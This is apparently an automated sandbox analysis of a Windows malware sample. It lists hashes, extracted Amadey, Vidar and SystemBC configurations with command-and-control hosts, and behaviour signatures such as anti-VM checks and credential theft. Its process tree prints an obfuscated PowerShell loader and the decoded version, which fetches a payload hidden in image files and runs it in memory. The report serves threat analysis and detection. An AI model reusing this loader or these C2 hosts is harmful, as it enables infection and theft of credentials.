Analysis

  • max time kernel
    138s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    27/02/2025, 19:27

General

  • Target

    75feb5227095b1fdb72953933df3e907.exe

  • Size

    3.0MB

  • MD5

    75feb5227095b1fdb72953933df3e907

  • SHA1

    82c65fd8b1b296003dea002dd0a640a23063fb23

  • SHA256

    6d4e4eafdd4a46ea7c96557580c7c39f1d850bb0b6ed1ddfaf884ea7b675df65

  • SHA512

    c9406d2e563b34003950a767331c2673d3e823a24c2a713dff33db2c43df818b7dfcfafe6e62794bff6efdddfd9e0e3f3627117148ecdfb182434047c882a418

  • SSDEEP

    49152:bwS/EH+l/uCNZlZ0ws0642Yu6EM1+ZdWSAv4W1UF/LYYmID4:bNEHIlZ01069Yu6EncA/wID

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3

Attributes
  • dns

    5.132.191.104

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 12 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 13 IoCs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 6 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 59 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\75feb5227095b1fdb72953933df3e907.exe
    "C:\Users\Admin\AppData\Local\Temp\75feb5227095b1fdb72953933df3e907.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Downloads MZ/PE file
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Users\Admin\AppData\Local\Temp\JUADN6QKR3Z95514SKRXLZILS6OR2.exe
      "C:\Users\Admin\AppData\Local\Temp\JUADN6QKR3Z95514SKRXLZILS6OR2.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Downloads MZ/PE file
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
          "C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2808
          • C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
            "C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:2076
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
              6⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:2864
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7069758,0x7fef7069768,0x7fef7069778
                7⤵
                  PID:2948
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  7⤵
                    PID:2368
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:2
                    7⤵
                      PID:2052
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:8
                      7⤵
                        PID:1828
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:8
                        7⤵
                          PID:2244
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2312 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:2104
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2324 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:2392
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:2
                          7⤵
                            PID:2620
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3248 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:1
                            7⤵
                            • Uses browser remote debugging
                            PID:2260
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:8
                            7⤵
                              PID:2972
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3488 --field-trial-handle=1224,i,11715679509458428402,7954250107282457891,131072 /prefetch:8
                              7⤵
                                PID:2992
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\1vkf3" & exit
                              6⤵
                              • System Location Discovery: System Language Discovery
                              PID:864
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 11
                                7⤵
                                • System Location Discovery: System Language Discovery
                                • Delays execution with timeout.exe
                                PID:2544
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 500
                            5⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:1752
                        • C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe
                          "C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"
                          4⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3064
                        • C:\Users\Admin\AppData\Local\Temp\10003000101\ff23b75dcf.exe
                          "C:\Users\Admin\AppData\Local\Temp\10003000101\ff23b75dcf.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:2408
                          • C:\Users\Admin\AppData\Local\Temp\10003000101\ff23b75dcf.exe
                            "C:\Users\Admin\AppData\Local\Temp\10003000101\ff23b75dcf.exe"
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2700
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 500
                            5⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:3036
                        • C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe
                          "C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"
                          4⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1620
                        • C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
                          "C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"
                          4⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          PID:1396
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c lom.bat
                            5⤵
                              PID:576
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic cpu get name
                                6⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2020
                              • C:\Windows\system32\find.exe
                                find "QEMU"
                                6⤵
                                  PID:2348
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@g@D0@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@FM@dQBi@HM@d@By@Gk@bgBn@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Cw@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@HQ@ZQB4@HQ@I@@9@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@Ow@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@cgBT@GE@aQBm@Ek@Yg@v@G8@ZgBu@Gk@LwBn@HI@bw@u@G0@YQBr@HU@cgBl@HM@YQBk@HM@ZQBo@HQ@ZQBi@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2740
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.rSaifIb/ofni/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                    7⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1496
                            • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                              "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                              4⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              PID:2264
                              • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                                "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                                5⤵
                                • Executes dropped EXE
                                PID:620
                              • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                                "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                                5⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2456
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  6⤵
                                  • Uses browser remote debugging
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of FindShellTrayWindow
                                  PID:2936
